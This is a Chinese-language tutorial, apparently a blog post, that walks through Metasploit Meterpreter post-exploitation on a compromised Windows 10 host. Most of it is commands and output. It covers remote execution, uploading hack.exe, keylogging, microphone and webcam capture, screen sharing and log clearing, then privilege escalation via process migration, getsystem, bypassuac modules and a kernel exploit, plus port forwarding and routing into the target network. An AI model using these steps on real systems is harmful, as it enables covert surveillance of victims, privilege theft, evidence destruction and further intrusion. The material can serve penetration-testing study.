一、远程执行命令

书接上回，监听之后可以远程执行指令

#列出当前所在目录
meterpreter > pwd
#列出本地当前所在目录
meterpreter > lpwd
#跳转指定目录
meterpreter > cd  c:\\
#查看当前目录
meterpreter > dir
#指定上传文件
meterpreter > upload hack.exe
#使用execute命令在目标系统中执行命令
meterpreter > execute  -f notepad.exe       #在对方电脑上，弹出一个记事本.exe
meterpreter > edit a.txt Hello!             #编辑文本
meterpreter > execute -f "notepad.exe a.txt"#使用记事本打开文本
meterpreter > execute -f calc.exe           #在对方电脑上，弹出计算器 
meterpreter > execute -H -i -f cmd.exe      #以后台，隐藏的方式，运行 cmd 
输入：exit  退出
#屏幕截图
meterpreter > screenshot
#屏幕分享
meterpreter > screenshare
#vnc只能看不能操作
meterpreter > run vnc
#键盘监听
meterpreter > keyscan_start 
meterpreter > keyscan_stop
#麦克风监听 秒
meterpreter > record_mic -d 5
#查看摄像头
meterpreter > webcam_list
1: Chicony USB2.0 Camera
#使用设备1拍照
meterpreter > webcam_snap -i 1
#实时监控
meterpreter > webcam_stream -i 1 
#help查看命令
meterpreter > help
#清除windows中的应用程序日志、系统日志、安全日志
meterpreter > clearav

二、WIN10提权

在Windows中，超级管理员权限和系统权限是两种不同的访问权限级别。

超级管理员权限（或称为管理员权限）是Windows操作系统中最高的权限级别之一。具有超级管理员权限的用户拥有对操作系统的完全访问权限，可以执行系统范围的修改、安装和卸载应用程序、更改系统设置等操作。超级管理员权限对系统文件和关键系统组件具有完全控制权。

系统权限是指系统级别的权限，在Windows操作系统中用于控制系统服务和其他系统特性的访问级别。这包括管理网络连接、配置系统时间、监视系统事件日志等功能。系统权限由操作系统自动管理，并且只有特定的系统进程和服务具有这些权限。

需要注意的是，超级管理员权限是一个用户角色，而系统权限是操作系统内部使用的权限级别。超级管理员权限可以被分配给不同的用户账户，而系统权限只能由操作系统进程和服务使用。

在日常使用电脑时，我们通常以管理员权限登录操作系统，这样可以执行大多数常见的管理任务。只有在特定情况下，例如需要修改系统设置或进行高级系统维护时，才需要使用超级管理员权限。

#查看当前用户
meterpreter > getuid     
Server username: WHOISME\13038#查看进程 -s查看系统进程Win10
meterpreter > ps -s
Filtering on SYSTEM processes...
No matching processes were found.
#查看进程
meterpreter > ps
Process List
============PID    PPID   Name                                   Arch  Session  User           Path---    ----   ----                                   ----  -------  ----           ----0      0      [System Process]4      0      System224    4      Registry800    4      smss.exe1140   1000   csrss.exe1172   1652   dwm.exe1240   1324   svchost.exe1244   1000   wininit.exe1252   1236   csrss.exe#当前程序PID
meterpreter > getpid
Current pid: 6576
#win10可以迁移进程系统PID完成提权
meterpreter > migrate 1240#转移到非系统用户，查看资源管理器(用户)进程
meterpreter > ps -S explorer
Filtering on 'explorer'
Process List
============PID   PPID   Name          Arch  Session  User           Path---   ----   ----          ----  -------  ----           ----8060  10100  explorer.exe  x64   1        WHOISME\13038  C:\Windows\explorer.exe
#迁移进程至目标PID
meterpreter > migrate 8060#其他思路#将目标机的3389端口转发到本地6666端口
portfwd add -l 6666 -p 3389 -r 127.0.0.1 
#添加路由
run autoroute –h #查看帮助
run autoroute -s 192.168.159.0/24  #添加到目标环境网络
run autoroute –p  #查看添加的路由

三、其他提权方法

参考CSDN博主「白昼安全」的原创文章方法

1.getsystem

getsystem

getsystem工作原理：

①getsystem创建一个新的Windows服务，设置为SYSTEM运行，当它启动时连接到一个命名管道。

②getsystem产生一个进程，它创建一个命名管道并等待来自该服务的连接。

③Windows服务已启动，导致与命名管道建立连接。

④该进程接收连接并调用ImpersonateNamedPipeClient，从而为SYSTEM用户创建模拟令牌。
然后用新收集的SYSTEM模拟令牌产生cmd.exe，并且我们有一个SYSTEM特权进程。

2.bypassuac

内置多个bypassuac脚本，原理有所不同，使用方法类似，运行后返回一个新的会话，需要再次执行getsystem获取系统权限，如：

use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask

如何使用bypassuac.rb脚本：

msf > use exploit/windows/local/bypassuac
msf > set SESSION 2
msf > run

3.内核漏洞提权

可先利用enum_patches模块 收集补丁信息，然后查找可用的exploits进行提权

meterpreter > run post/windows/gather/enum_patches  #查看补丁信息
msf > use exploit/windows/local/ms13_053_schlamperei
msf > set SESSION 2
msf > exploit